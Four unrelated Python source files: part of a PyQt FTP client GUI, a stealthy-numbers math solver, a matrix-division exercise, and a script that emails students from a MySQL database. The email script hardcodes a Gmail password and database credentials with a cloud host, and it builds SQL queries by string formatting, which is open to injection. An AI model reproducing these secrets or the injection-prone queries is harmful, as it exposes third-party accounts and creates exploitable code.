        host_edit.setFixedSize(150, 25)
        host_edit.setToolTip('Enter host name without protocol\r\n'
                             'FTP protocol only supported')
        self.edit_lines['host_edit'] = host_edit
        password_edit = QtWidgets.QLineEdit()
        password_edit.setEchoMode(QtWidgets.QLineEdit.Password)
        password_edit.setFixedSize(150, 25)
        password_edit.setToolTip('Enter password\r\n'
                                 'Password never be saved')
        self.edit_lines['password_edit'] = password_edit
        username_edit = QtWidgets.QLineEdit()
        username_edit.setPlaceholderText('anonymous')
        username_edit.setFixedSize(150, 25)
        username_edit.setToolTip('Enter username\r\n'
                                 'If skipped, '
                                 '"anonymous" username will be used')
        self.edit_lines['username_edit'] = username_edit
        port_edit = QtWidgets.QLineEdit()
        port_edit.setPlaceholderText('21')
        port_edit.setFixedSize(50, 25)
        port_edit.setValidator(QtGui.QIntValidator(0, 65536, port_edit))
        self.edit_lines['port_edit'] = port_edit
    def connect_remote_file_system(self):
        """Wire core signals to the (current) remote filesystem model."""
        self.core.ready_to_read_dirlist. \
            connect(self.widgets['remote_filesystem']
                    .model()
                    .fetch_root)
        self.core.update_remote_model.connect(self.widgets['remote_filesystem']
                                              .model().refresh)
        self.widgets['remote_filesystem'] \
            .model() \
            .directory_listing_needed \
            .connect(self.core.get_directory_list)
        # self.widgets['remote_filesystem'] \
        #     .model() \
        #     .file_uploading \
        #     .connect(self.core.upload_file)
    def connect_signals_to_slots(self):
        self.buttons['conn_button'].clicked.connect(self.send_conn_info)
        for edit_line in self.edit_lines.values():
            edit_line.returnPressed. \
                connect(self.send_conn_info)
        self.core.already_connected.connect(self.on_already_connected)
        self.core.new_log.connect(self.widgets['log_browser'].append)
        self.connect_remote_file_system()
        self.widgets['local_filesystem'].model() \
            .file_downloading.connect(self.core.start_file_downloading)
        self.core.update_local_model.connect(self.widgets['local_filesystem']
                                             .model().refresh)
    def disconnect_old_remote_model(self):
        self.core.update_remote_model.disconnect()
        self.core.ready_to_read_dirlist.disconnect()
    def on_already_connected(self):
        """Confirm dropping the current session before reconnecting."""
        warning_window = QtWidgets.QMessageBox()
        warning_window.setWindowTitle("Are you sure want to reconnect?")
        warning_window.setText("If you reconnect, all of your "
                               "connections and transfers "
                               "will be lost.\r\n"
                               "Do you want to continue?")
        yes_button = warning_window.addButton(QtWidgets.QMessageBox.Yes)
        warning_window.addButton(QtWidgets.QMessageBox.No)
        warning_window.setIcon(QtWidgets.QMessageBox.Warning)
        warning_window.setWindowModality(QtCore.Qt.ApplicationModal)
        warning_window.exec()
        if warning_window.clickedButton() == yes_button:
            self.core.set_connected(False)
            self.widgets['remote_filesystem'].reinitialise()
            self.disconnect_old_remote_model()
            self.connect_remote_file_system()
            self.send_conn_info()
        else:
            pass
    def send_conn_info(self) -> None:
        """Forward the entered connection parameters to the core."""
        hostname = self.edit_lines['host_edit'].text()
        username = self.edit_lines['username_edit'].text()
        password = self.edit_lines['password_edit'].text()
        port = self.edit_lines['port_edit'].text()
        self.core.start_connecting(hostname, port, username, password)
    def create_buttons(self):
        conn_button = QtWidgets.QPushButton("Connect")
        def keyPressEvent(e):
            # BUG FIX: the original condition was
            # "e.key() == QtCore.Qt.Key_Enter or QtCore.Qt.Key_Return", which
            # is always true (Key_Return is a non-zero constant), so EVERY
            # key press clicked the button. Only Enter/Return should.
            if e.key() in (QtCore.Qt.Key_Enter, QtCore.Qt.Key_Return):
                conn_button.click()
        conn_button.keyPressEvent = keyPressEvent
        self.buttons['conn_button'] = conn_button
    def create_layouts(self):
        """Build the connection-toolbar form layouts and the main layouts."""
        conn_toolbar_layout = QtWidgets.QHBoxLayout()
        conn_toolbar_layout.setSizeConstraint(QtWidgets.QLayout.SetFixedSize)
        host_form_layout = QtWidgets.QFormLayout()
        password_form_layout = QtWidgets.QFormLayout()
        username_form_layout = QtWidgets.QFormLayout()
        port_form_layout = QtWidgets.QFormLayout()
        host_form_layout.addRow('Host: ',
                                self.edit_lines['host_edit'])
        username_form_layout.addRow('Username: ',
                                    self.edit_lines['username_edit'])
        password_form_layout.addRow('Password: ',
                                    self.edit_lines['password_edit'])
        port_form_layout.addRow('Port: ',
                                self.edit_lines['port_edit'])
        conn_toolbar_layout.addLayout(host_form_layout)
        conn_toolbar_layout.addLayout(username_form_layout)
        conn_toolbar_layout.addLayout(password_form_layout)
        conn_toolbar_layout.addLayout(port_form_layout)
        conn_toolbar_layout.addWidget(self.buttons['conn_button'])
        self.layouts['conn_toolbar_layout'] = conn_toolbar_layout
        dir_models_layout = QtWidgets.QHBoxLayout()
        self.layouts['dir_models_layout'] = dir_models_layout
        main_layout = QtWidgets.QVBoxLayout()
        self.layouts['main_layout'] = main_layout
    def create_toolbars(self):
        def create_main_toolbar():
            main_toolbar = self.addToolBar('Main tools')
            main_toolbar.addAction(self.actions['exit_action'])
            main_toolbar.insertSeparator(self.actions['exit_action'])
            main_toolbar.setAllowedAreas(QtCore.Qt.TopToolBarArea)
            main_toolbar.setFloatable(False)
            main_toolbar.setMovable(False)
            self.addToolBarBreak()
        def create_connection_toolbar():
            connection_toolbar = self.addToolBar('Connection tools')
            connection_toolbar.addWidget(self.widgets['conn_widget'])
            connection_toolbar.setFloatable(False)
            connection_toolbar.setMovable(False)
        create_main_toolbar()
        create_connection_toolbar()
    def create_widgets(self):
        """Create the log browser, filesystem explorers and container widgets."""
        log_browser = QtWidgets.QTextEdit()
        log_browser.textChanged.connect(self.core.on_log_read)
        log_browser.setReadOnly(True)
        self.widgets['log_browser'] = log_browser
        local_filesystem = local.FileSystemExplorer()
        self.widgets['local_filesystem'] = local_filesystem
        remote_filesystem = remote.RemoteFileSystemExplorer()
        self.widgets['remote_filesystem'] = remote_filesystem
        conn_widget = QtWidgets.QWidget()
        self.widgets['conn_widget'] = conn_widget
        widget = QtWidgets.QWidget()
        self.widgets['central_widget'] = widget
|
import math, time, matplotlib.pyplot as plt, numpy, functools
# The solution is 75737353,
# and it took 102.2976252 seconds to compute with version 5!
# After improving with version 7,
# it takes only 37.6414667 seconds to compute!
def getFactor(n):
    """Return the smallest divisor of n greater than 1 (n itself when prime)."""
    candidate = 2
    upper = math.floor(math.sqrt(n))
    while candidate <= upper:
        if n % candidate == 0:
            return candidate
        candidate += 1
    return n
def factorize(n):
    """Return the sorted list of all divisors of n, built by repeatedly
    peeling off the smallest remaining factor."""
    divisors = {1}
    while n > 1:
        factor = getFactor(n)
        n //= factor
        # multiply every known divisor by the new factor (materialize the
        # list first so the set is not mutated while being iterated)
        divisors.update([factor * d for d in divisors])
    return sorted(divisors)
def naiveStealthy(n):
    """Return True when n = a*b = c*d with a + b == c + d + 1 (stealthy test)."""
    divisors = factorize(n)[::-1]  # all divisors, largest first; O(sqrt(n))
    count = len(divisors)
    for i in range(count - 1):
        a = divisors[i]
        b = n // a
        for j in range(count - 1):
            c = divisors[j]
            d = n // c
            if a + b == c + d + 1:
                return True
    return False
def naiveCountStealthy(N):
    """Count stealthy numbers in [1, N) by brute force; O(N^2) overall."""
    total = 0
    for n in range(1, N):
        total += naiveStealthy(n)
    return total
def mixedParity(a, b):
    """Return 1 when exactly one of a and b is odd, otherwise 0."""
    return (a + b) & 1
def impNaiveStealthy(n):
    """Stealthy test restricted to divisors strictly between a and its cofactor."""
    divisors = factorize(n)[::-1]  # largest first; O(sqrt(n))
    for i_a in range(len(divisors) - 1):
        a = divisors[i_a]
        b = n // a
        i_b = divisors.index(b)
        # only candidates c between a (exclusive) and b (exclusive) can work
        for i_c in range(i_a + 1, i_b):
            c = divisors[i_c]
            d = n // c
            if a + b == c + d + 1:
                return True
    return False
def impNaiveCountStealthy(N):
    """Count stealthy numbers below N; only multiples of 4 can qualify."""
    return sum(1 for n in range(4, N, 4) if impNaiveStealthy(n))
def imp2NaiveStealthy(n):
    """Stealthy test scanning only the upper half of the divisor list."""
    divisors = factorize(n)[::-1]  # O(sqrt(n))
    half = len(divisors) // 2
    for i in range(half):
        a = divisors[i]
        b = n // a
        for j in range(i + 1, half + 1):
            c = divisors[j]
            # a + b == c + d + 1 with d = n // c  <=>  (a + b - c - 1) * c == n
            if (a + b - c - 1) * c == n:
                return True
    return False
def imp2NaiveCountStealthy(N):
    """Count stealthy numbers below N using imp2NaiveStealthy; O(N^2)."""
    return sum(1 for n in range(4, N, 4) if imp2NaiveStealthy(n))
def imp3NaiveStealthy(n):
    """Stealthy test via the quadratic: for each divisor pair (a, b), check
    whether m = a + b - 1 splits as c + d with c*d = n, i.e. whether
    m*m - 4*n is a perfect square.

    NOTE: ``math.sqrt(x) % 1`` is a float test and may misjudge very large
    radicands; math.isqrt would be exact, kept as-is to mirror the original.
    """
    f = factorize(n)  # O(sqrt(n))
    L = len(f)
    n4 = n * 4
    for i_b in range(L // 2):
        b = f[i_b]
        a = f[L - i_b - 1]
        m = a + b - 1
        radicand = m * m - n4
        # BUG FIX: the original used a bare "except:" to skip negative
        # radicands, which also silently swallowed every other error.
        # Test the sign explicitly instead.
        if radicand >= 0 and not math.sqrt(radicand) % 1:
            return True
    return False
def imp3NaiveCountStealthy(N):
    """Count stealthy numbers below N using imp3NaiveStealthy; O(N*sqrt(N))."""
    return sum(1 for n in range(4, N, 4) if imp3NaiveStealthy(n))
def imp4NaiveStealthy(n):
    """Stealthy test: look for two complementary divisor-pair sums differing by 1."""
    seen_sums = set()
    divisors = factorize(n)  # O(sqrt(n))
    count = len(divisors)
    # walk pairs (small, large) from the middle outwards
    for i in range(count // 2, -1, -1):
        small = divisors[i]
        large = divisors[count - i - 1]
        pair_sum = small + large
        if pair_sum + 1 in seen_sums or pair_sum - 1 in seen_sums:
            return True
        seen_sums.add(pair_sum)
    return False
def imp4NaiveCountStealthy(N):
    """Count stealthy numbers below N using imp4NaiveStealthy; O(N*sqrt(N))."""
    return sum(1 for n in range(4, N, 4) if imp4NaiveStealthy(n))
def imp5NaiveCountStealthy(N): # THIS ONE WORKED!
    """Count stealthy numbers below N.

    Each stealthy number n corresponds to exactly one product of two
    triangular numbers equal to n/4; relies on the precomputed module-level
    TRI_PRODUCTS set (building it costs O(sqrt(N)^2) = O(N)).
    """
    bound = N // 4
    return sum(1 for product in TRI_PRODUCTS if product <= bound)
@functools.lru_cache(10**7)
def imp6CountStealthy(N): # BROKEN
    # NOTE(review): marked BROKEN by the author - presumably it overcounts
    # because the same triangular product is reached via several pairs;
    # verify before reuse. Also depends on the module-level TRIANGULARS set.
    ret = 0
    for T in sorted(TRIANGULARS): # O(sqrt(N))
        if T < N:
##            i = countTriangularsTo(N // T)
            potentialProds = countTriangularsTo(N // T) # O(1)
##            print(N, T, i, potentialProds)
            ret += potentialProds
##    print(ret)
    return ret # O(sqrt(N))
def imp7CountStealthy(N):
    """Count distinct products of two triangular numbers that are <= N/4.

    Each stealthy number below N corresponds to exactly one such product;
    relies on the module-level TRIANGULARS set being populated first.
    """
    bound = N // 4
    triangulars = sorted(TRIANGULARS)
    seen_products = set()
    for i, first in enumerate(triangulars):
        for second in triangulars[i:]:
            product = first * second
            if product > bound:
                break  # both factors only grow from here
            seen_products.add(product)
    return len(seen_products)
def genTriangulars(N):
    """Return the set of triangular numbers strictly below N."""
    triangulars = set()
    term, step = 1, 2
    while term < N:
        triangulars.add(term)
        term += step  # next triangular number: T(k+1) = T(k) + (k+1)
        step += 1
    return triangulars
def countTriangularsTo(N):
    """Count triangular numbers T with 1 <= T <= N (inverse of k(k+1)/2)."""
    root = math.sqrt(1 + 8 * N)
    return int(root - 1) // 2
def products(ls, T_index = 6):
    """Return the set of products ls[i] * ls[j] (i <= j) not exceeding the
    module-level bound N.

    ``ls`` must be sorted ascending so the inner loop can break early;
    ``T_index`` is a leftover parameter from the collision-debugging code
    kept commented out below.
    """
## T = sorted(TRIANGULARS)[T_index]
## origs = dict()
## colls = set()
    ret = set()
    for i in range(len(ls)):
        for j in range(i, len(ls)):
            to_add = ls[i] * ls[j]
            if to_add <= N: # THIS WAS THE CRUCIAL INGREDIENT!
## if to_add in ret:
## orig_i, orig_j = origs[to_add]
## if T in [ls[i], ls[j], orig_i, orig_j]:
## colls.add((to_add, ls[i], ls[j], orig_i, orig_j))
## print("COLLISION: ", to_add)
## else:
## origs[to_add] = (ls[i], ls[j])
                ret.add(to_add)
            else:
                break
## print(f"{T_index} : \t{T}\tCOLLISIONS --", len(colls), len(factorize(T)))
## for c, i, j, orig_i, orig_j in sorted(colls):
## print(c, i, j, orig_i, orig_j)
    return ret
# Upper bound for the stealthy-number count (the problem's target input size)
N = 10**14
##start = time.perf_counter()
##ls = naiveCountStealthy(N)
##end = time.perf_counter()
##print(end - start)
##start = time.perf_counter()
##ls2 = imp2NaiveCountStealthy(N)
##end = time.perf_counter()
##print(end - start)
##start = time.perf_counter()
##ls3 = imp3NaiveCountStealthy(N)
##end = time.perf_counter()
##print(end - start)
##print(ls3)
def conditions(n):
    """Describe which known predicates hold for n.

    Currently only one is active: membership in the module-level TRI_PRODUCTS
    set (earlier experiments - triangularity, divisibility - were retired).
    """
    labels = []
    if n in TRI_PRODUCTS:
        labels.append("triproduct")
    return ", ".join(labels)
##start = time.perf_counter()
##ls4 = imp4NaiveCountStealthy(N)
####tri4 = (math.sqrt(1 + 2 * N) - 1) // 2
##end = time.perf_counter()
##print(end - start)
##print(ls4, tri4, tri4 / ls4)
##
##start = time.perf_counter()
##ls4 = imp4NaiveCountStealthy(10*N)
##end = time.perf_counter()
##print(end - start)
##print(ls4)
##print(ls3, ls4)
# Timed run: build the triangular-number set once, then count the distinct
# triangular products up to N with the imp7 approach.
start = time.perf_counter()
TRIANGULARS = genTriangulars(N // 4) # O(sqrt(N)) time
##for i in range(len(TRIANGULARS)):
##    print("i : ", i)
##    TRI_PRODUCTS = products(list(TRIANGULARS), i) # O(sqrt(N)^2) = O(N) time
##TRI_PRODUCTS = products(sorted(TRIANGULARS)) # O(sqrt(N)^2) = O(N) time
##ls5 = imp5NaiveCountStealthy(N) # O(N) time
ls7 = imp7CountStealthy(N)
end = time.perf_counter()
print(end - start)
print(ls7)
##start = time.perf_counter()
##TRIANGULARS = genTriangulars(N // 4) # O(sqrt(N)) time
##ls6 = imp6CountStealthy(N) # O(sqrt(N)) time
##end = time.perf_counter()
##print(end - start)
##print(ls5, ls6)
##xs = []
##for mag in range(3, 6):
## for mult in range(1, 10, 2):
## xs.append(mult * 10 ** mag)
##ys = [imp3NaiveCountStealthy(x) for x in xs]
##
##def log(xs):
## return [math.log(x) for x in xs]
##
##plyft = numpy.polyfit(log(xs), log(ys), 1)
##print(plyft)
##
##fs = [x**plyft[0] * math.exp(plyft[1]) for x in xs]
##
####plt.scatter(log(xs), log(ys))
##plt.scatter(xs, ys)
##plt.plot(xs, fs)
##plt.show()
##ts = list(range(1,10**3))
##stealthy = [t*imp4NaiveStealthy(t) for t in ts]
##plt.scatter(ts, stealthy)
##plt.show()
##last = 0
##for x in range(2, N):
## if imp2NaiveStealthy(x):
## print(f"{x}\t{x % 4}\t{x%8}\t{x%12}\t{x%16}\t{x-last}")
## last = x
# ----- Trying a multilinear regression to detect some pattern I don't see -----
# INPUTS:
# pi function (prime count), number of divisors, remainder modulo 4, 8, 12?
# OUTPUTS:
# stealthy count
|
#!/usr/bin/python3
"""This module performs math on matrices"""
def matrix_divided(matrix, div):
    """Divide every element of a matrix by a number.

    Args:
        matrix (list of lists of int/float): the matrix to divide.
        div (int or float): the divisor applied to each element.

    Returns:
        list of lists: a new matrix with each element divided by ``div``
        and rounded to 2 decimal places (the input is not modified).

    Raises:
        TypeError: if matrix is not a list of lists of ints/floats,
            if rows differ in size, or if div is not a number.
        ZeroDivisionError: if div is 0.
    """
    err_1 = "matrix must be a matrix (list of lists) of integers/floats"
    err_2 = "Each row of the matrix must have the same size"
    err_3 = "div must be a number"
    err_4 = "division by zero"
    # Reject non-lists and the empty matrix.  The original crashed with
    # an unhandled IndexError on matrix[0] when matrix was [].
    if not isinstance(matrix, list) or not matrix:
        raise TypeError(err_1)
    for row in matrix:
        if not isinstance(row, list):
            raise TypeError(err_1)
        # Every row must match the first row's length.
        if len(row) != len(matrix[0]):
            raise TypeError(err_2)
        for element in row:
            if not isinstance(element, (int, float)):
                raise TypeError(err_1)
    if not isinstance(div, (int, float)):
        raise TypeError(err_3)
    if div == 0:
        raise ZeroDivisionError(err_4)
    # Build a brand-new matrix; round to 2 decimal places per spec.
    return [[round(element / div, 2) for element in row] for row in matrix]
|
#!/home/myuser/bin/python
# Addresses that failed to send are collected here and reported at exit.
not_sent_emails = []
import smtplib as s
import ssl
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import numpy
# Path hack so mysql.connector resolves on the EC2 host.
import sys; sys.path.append('/home/ec2-user/anaconda3/lib/python3.8/site-packages/mysql')
import mysql.connector
from mysql.connector import errorcode
import pandas as pd
import helper_functions
def send(name_of_email, subject, content, student_fname, email, pemail, list_of_content, extra_content = None):
    """Render an HTML email from a template and send it to the student and
    parent addresses via Gmail SMTP.

    Args:
        name_of_email: template key ("e1", "esa", ...); selects tweaks.
        subject: subject template, formatted with list_of_content[0].
        content: HTML body template with positional "{}" placeholders.
        student_fname: student first name (capitalised into the body).
        email / pemail: student and parent recipient addresses.
        list_of_content: positional values substituted into the body.
        extra_content: optional replacement for the schedule line (e1).

    Side effects: failed recipients are appended to not_sent_emails.
    """
    port = 465
    # SECURITY: hardcoded credentials — move to env vars / a secret store.
    sender = "helmlearning2020@gmail.com"
    password = "h3lml3arning"
    message = MIMEMultipart("alternative")
    message["Subject"] = subject.format(list_of_content[0])
    message["From"] = "HELM Learning"
    message["To"] = email
    if name_of_email == "e1":
        if extra_content is not None:
            content = content.replace("5 Weeks, once per week)", extra_content)
        if "weeklong" in list_of_content[5]:
            content = content.replace("5 Weeks, once per week)", "5 days in a week, Mon-Fri)")
    elif name_of_email == "esa":
        # The "esa" template wants the first two values swapped.
        list_of_content[0], list_of_content[1] = list_of_content[1], list_of_content[0]
    html = content.format(
        student_fname[0].upper() + student_fname[1:],
        *list_of_content
    )
    part2 = MIMEText(html, "html")
    message.attach(part2)
    context = ssl.create_default_context()
    with s.SMTP_SSL("smtp.gmail.com", port, context=context) as server:
        server.login(sender, password)
        try:
            server.sendmail(sender, email, message.as_string())
            server.sendmail(sender, pemail, message.as_string())
            print("Sent!\n")
        except Exception:
            # Narrowed from a bare `except:` so Ctrl-C still interrupts.
            print("NOT SENT\n")
            not_sent_emails.append(email)
            not_sent_emails.append(pemail)
# SECURITY: database credentials are hardcoded — move to env/secret store.
config = {
    'user': 'helmlearning',
    'password': 'H3lml3arning',
    'host': 'helmlearningdatabase-1.cnoqlueuri3g.us-east-1.rds.amazonaws.com', #52.21.172.100:22
    'port': '3306',
    'database': 'HELM_Database'
}
# Month number -> abbreviation used in email date rendering.
months = {
    1: "Jan",
    2: "Feb",
    3: "March",
    4: "April",
    5: "May",
    6: "June",
    7: "July",
    8: "Aug",
    9: "Sept",
    10: "Oct",
    11: "Nov",
    12: "Dec"
}
# Holiday weeks: [year, month, day, HTML note appended to the schedule].
skipping_weeks = [
    [2020, 11, 23, " (skipping the week of Thanksgiving, <br>Nov 23 2020 - Nov 29 2020)"],
    [2020, 12, 21, " (skipping the weeks of Christmas and New Years, <br>Dec 21 2020 - Jan 3 2021)"]
]
def create_connection():
    """
    Returns a database connection using mysql.connector.

    On failure, prints a human-readable diagnosis and re-raises.
    """
    # open database connection; also bound to the module-level `cnx`
    # so the __main__ block can commit/close it.
    global cnx
    try:
        cnx = mysql.connector.connect(**config)
        return cnx
    except mysql.connector.Error as err:
        if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
            print("Something is wrong with your user name or password")
        elif err.errno == errorcode.ER_BAD_DB_ERROR:
            print("Database does not exist")
        else:
            print(err)
        raise
def e1(class_name, cursor):
    """Send the welcome (e1) email for `class_name` to students who
    enrolled since `last_student`; hands off to e2 when the class is
    capped (student_cap != -1).

    NOTE(review): SQL is built with str.format — acceptable for trusted
    operator input, but not injection-safe.
    """
    sql5 = 'SELECT id, last_student FROM classes WHERE short_name = "{}"'.format(class_name)
    sql4 = 'SELECT student_id FROM classes_to_students WHERE class_id = "{}" AND timestamp > "{}"'
    sql2 = 'SELECT name, teacher, e1_summary, starttime, endtime, day, startdate, day, enddate, zoom, zoom, e1_additionalwork, teacher, email, name FROM classes WHERE short_name = "%s";' % (class_name[0].upper() + class_name[1:])
    sql3 = 'SELECT subject, content FROM templates WHERE name="{}"'.format("e1")
    sql = 'SELECT Email_Address, Parent_Email, Student_Name FROM students WHERE id = {}'
    sql_e2 = 'SELECT student_cap FROM classes WHERE short_name = "{}"'.format(class_name)
    cursor.execute(sql_e2)
    student_cap = cursor.fetchall()[0][0]
    # A capped class needs waitlist handling: delegate to e2.
    if student_cap != -1:
        e2(class_name, cursor)
        return
    cursor.execute(sql5)
    class_asdf = cursor.fetchall()[0]
    class_id = class_asdf[0]
    last_stud = class_asdf[1]
    # NULL marker means "never sent": include every enrollment.
    if (last_stud == None):
        last_stud = "0000-00-00 00:00:00"
    cursor.execute(sql4.format(class_id, last_stud))
    student_ids = cursor.fetchall()
    cursor.execute(sql2)
    class_info = list(cursor.fetchall()[0])
    cursor.execute(sql3)
    stuff = cursor.fetchall()[0]
    email_info = []
    email_info.append(stuff[0])
    email_info.append(stuff[1])
    # Convert stored times into EST/CST display strings.
    time_est = helper_functions.gettime(class_info[3], class_info[4])[0]
    time_cst = helper_functions.gettime(class_info[3], class_info[4])[1]
    class_info[3] = time_est
    class_info[4] = time_cst
    startdate = helper_functions.getdate(class_info[6], class_info[8])[0]
    enddate = helper_functions.getdate(class_info[6], class_info[8])[1]
    import datetime
    skipclass = None
    # If a holiday week falls inside the class window, note it in the email.
    for i in skipping_weeks:
        if class_info[6] < datetime.date(i[0], i[1], i[2]) and class_info[8] > datetime.date(i[0], i[1], i[2]):
            skipclass = "5 Weeks, once per week)<br><strong>{}</strong>".format(i[3])
    class_info[6] = startdate
    class_info[8] = enddate
    if "weeklong" in class_info[5]:
        class_info[5] = "Monday"
        class_info[7] = "Friday"
    print(class_info)
    emails = []
    for j in student_ids:
        i = j[0]
        print(i)
        cursor.execute(sql.format(i))
        theemails = cursor.fetchall()[0]
        # De-duplicate recipients.
        if (list(theemails) not in emails):
            emails.append(list(theemails))
    sql_teacher_email = "SELECT email,email,teacher FROM classes WHERE id = '{}'".format(class_id)
    cursor.execute(sql_teacher_email)
    teacher_info = list(cursor.fetchall()[0])
    # NOTE(review): list.append returns None, so this prints None.
    print(emails.append(teacher_info))
    prep_to_send("e1", emails, email_info, class_info, qwert=[skipclass])
def e2(class_name, cursor):
    """Send welcome emails (e1 template) to students who made it into a
    capped class, and waitlist emails (e2 template) to those past the cap.

    Enrollments between `last_student` and `final_student` are welcomed;
    anything after `final_student` goes on the waitlist.
    """
    emails = []
    waitlist_emails = []
    sql = 'SELECT id FROM classes WHERE short_name = "%s"' % class_name
    sql2 = 'SELECT last_student, final_student FROM classes WHERE short_name = "%s"' % class_name
    sql3 = 'SELECT student_id, timestamp FROM classes_to_students WHERE class_id = "{}" AND timestamp > "{}" AND timestamp <= "{}"'
    sql35 = 'SELECT student_id, timestamp FROM classes_to_students WHERE class_id = "{}" AND timestamp > "{}"'
    sql4 = 'SELECT Email_Address, Parent_Email, Student_Name FROM students WHERE id = "{}"'
    sql5 = 'SELECT name, teacher, e1_summary, starttime, endtime, day, startdate, day, enddate, zoom, zoom, e1_additionalwork, teacher, email, name FROM classes WHERE short_name = "%s";' % (class_name[0].upper() + class_name[1:])
    sql55 = 'SELECT name, teacher, name FROM classes WHERE short_name = "%s";' % class_name
    sql6 = 'SELECT subject, content FROM templates WHERE name="e1"'
    sql65 = 'SELECT subject, content FROM templates WHERE name="e2"'
    print("1")
    cursor.execute(sql)
    class_id = cursor.fetchall()[0][0]
    print("2")
    cursor.execute(sql2)
    fila_student = cursor.fetchall()[0]
    print(fila_student[0])
    cursor.execute(sql3.format(class_id, fila_student[0], fila_student[1]))
    welcome_studentids = cursor.fetchall()
    print("4")
    cursor.execute(sql35.format(class_id, fila_student[1]))
    waitlist_studentids = cursor.fetchall()
    # Collect de-duplicated (student, parent, name) rows for each group.
    for i in welcome_studentids:
        cursor.execute(sql4.format(i[0]))
        student_info = cursor.fetchall()[0]
        if (student_info not in emails):
            emails.append(student_info)
    for i in waitlist_studentids:
        cursor.execute(sql4.format(i[0]))
        student_info = cursor.fetchall()[0]
        if (student_info not in waitlist_emails):
            waitlist_emails.append(student_info)
    print("5")
    cursor.execute(sql5)
    welcome_classinfo = list(cursor.fetchall()[0])
    # Convert stored times/dates into display strings.
    time_est = helper_functions.gettime(welcome_classinfo[3], welcome_classinfo[4])[0]
    time_cst = helper_functions.gettime(welcome_classinfo[3], welcome_classinfo[4])[1]
    welcome_classinfo[3] = time_est
    welcome_classinfo[4] = time_cst
    startdate = helper_functions.getdate(welcome_classinfo[6], welcome_classinfo[8])[0]
    enddate = helper_functions.getdate(welcome_classinfo[6], welcome_classinfo[8])[1]
    import datetime
    skipclass = None
    for i in skipping_weeks:
        if welcome_classinfo[6] < datetime.date(i[0], i[1], i[2]) and welcome_classinfo[8] > datetime.date(i[0], i[1], i[2]):
            skipclass = "5 Weeks, once per week)<br><strong>{}</strong>".format(i[3])
    welcome_classinfo[6] = startdate
    welcome_classinfo[8] = enddate
    if "weeklong" in welcome_classinfo[5]:
        welcome_classinfo[5] = "Monday"
        welcome_classinfo[7] = "Friday"
    # Replace NULL fields so str.format never renders "None".
    for i in range(len(welcome_classinfo)):
        if welcome_classinfo[i] == None:
            welcome_classinfo[i] = ''
    print("6")
    cursor.execute(sql55)
    # FIX: materialise as a list so the NULL clean-up below can assign
    # (the original kept the tuple returned by fetchall()).
    waitlist_classinfo = list(cursor.fetchall()[0])
    print(waitlist_classinfo)
    print("7")
    cursor.execute(sql65)
    waitlist_emailinfo = cursor.fetchall()[0]
    print("7.5")
    cursor.execute(sql6)
    email_info = cursor.fetchall()[0]
    print("8")
    # FIX: the original wrote `waitlist_classinfo[i] == ''` — a no-op
    # comparison instead of an assignment — so NULLs were never replaced.
    for i in range(0, len(waitlist_classinfo)):
        if (waitlist_classinfo[i] == None):
            waitlist_classinfo[i] = ''
    sql_teacher_email = "SELECT email,email,teacher FROM classes WHERE id = '{}'".format(class_id)
    cursor.execute(sql_teacher_email)
    teacher_info = list(cursor.fetchall()[0])
    # NOTE(review): list.append returns None, so this prints None.
    print(emails.append(teacher_info))
    prep_to_send("e2", emails, email_info, welcome_classinfo=welcome_classinfo, waitlist_emails=waitlist_emails, waitlist_emailinfo=waitlist_emailinfo, waitlist_classinfo=waitlist_classinfo)
def esa(class_name, cursor):
    """Send the "similar classes announcement" (esa) email advertising
    `class_name` to every student of the classes typed in interactively.

    The operator enters class short names one per prompt; an empty line
    or "stop" ends the list.
    """
    classes = []
    emails = []
    #subject_area = input("Subject Area? ")
    while True:
        r = input("What classes? ").lower()
        if (r == 'stop' or r == None or r== ''):
            break
        classes.append(r[0].upper() + r[1:])
    sql = 'SELECT id FROM classes WHERE short_name = "{}"'
    sql2 = 'SELECT student_id FROM classes_to_students WHERE class_id = "{}"'
    sql3 = 'SELECT Email_Address, Parent_Email, Student_Name FROM students WHERE id = "{}"'
    sql4 = 'SELECT short_name, name, short_name, description, teacher, starttime, endtime, startdate, enddate, day FROM classes WHERE short_name = "{}"'
    sql5 = 'SELECT subject, content FROM templates WHERE name="esa"'
    # qwert maps a student email -> the class they were found in, used by
    # prep_to_send to personalise the body.
    qwert = {}
    print(classes)
    for k in classes:
        cursor.execute(sql.format(k))
        class_id = cursor.fetchall()[0][0]
        cursor.execute(sql2.format(class_id))
        students = cursor.fetchall()
        for qw in students:
            cursor.execute(sql3.format(qw[0]))
            emaillist = list(cursor.fetchall()[0])
            emaillist.append(k)
            if (list(emaillist) not in emails):
                emails.append(list(emaillist))
            qwert[emaillist[0]] = k
    cursor.execute(sql4.format(class_name))
    class_info = list(cursor.fetchall()[0])
    #class_info.insert(0, input("subject_area"))
    class_info[5] = helper_functions.gettime(class_info[5], class_info[6])[0]
    class_info.remove(class_info[6])
    # Render the schedule line: "Day(s), start - end" or "TBD".
    if (helper_functions.getdate(class_info[6], class_info[7])[0] != "TBD"):
        if ("weeklong" in class_info[8]):
            class_info[6] = "Monday - Friday, " + helper_functions.getdate(class_info[6], class_info[7])[0] + " - " + helper_functions.getdate(class_info[6], class_info[7])[1]
        else:
            class_info[6] = class_info[8] + "s, " + helper_functions.getdate(class_info[6], class_info[7])[0] + " - " + helper_functions.getdate(class_info[6], class_info[7])[1]
    else:
        class_info[6] = "TBD"
    class_info.remove(class_info[7])
    class_info.remove(class_info[7])
    class_info.insert(2, "signup.helmlearning.com/page1.html?class=" + class_name.lower().replace(" ", "-"))
    class_info.insert(1, "[prev classes]")
    # FIX: the original did cursor.execute(sql5.format(email_to_send)) —
    # sql5 has no "{}" placeholder, and `email_to_send` is a global that
    # only exists when the module runs as a script (NameError otherwise).
    cursor.execute(sql5)
    email_info = list(cursor.fetchall()[0])
    prep_to_send("esa", emails, email_info, class_info, qwert=qwert)
def e3(class_name, cursor):
    """Send the mid-class (e3) email — drive link plus class logistics —
    to students enrolled between `last_student` and `final_student`."""
    emails = []
    sql = 'SELECT id FROM classes WHERE short_name = "{}"'
    sql2 = 'SELECT student_id, timestamp FROM classes_to_students WHERE class_id = "{}" AND timestamp > "{}" AND timestamp <= "{}"'
    sql6 = 'SELECT final_student FROM classes WHERE short_name = "{}"'
    sql3 = 'SELECT Email_Address, Parent_Email, Student_Name FROM students WHERE id = "{}"'
    sql4 = 'SELECT short_name, starttime, endtime, e3_briefdescription, zoom, zoom, teacher, name, final_student, last_student FROM classes WHERE short_name = "{}"'
    sql5 = 'SELECT subject, content FROM templates WHERE name="e3"'
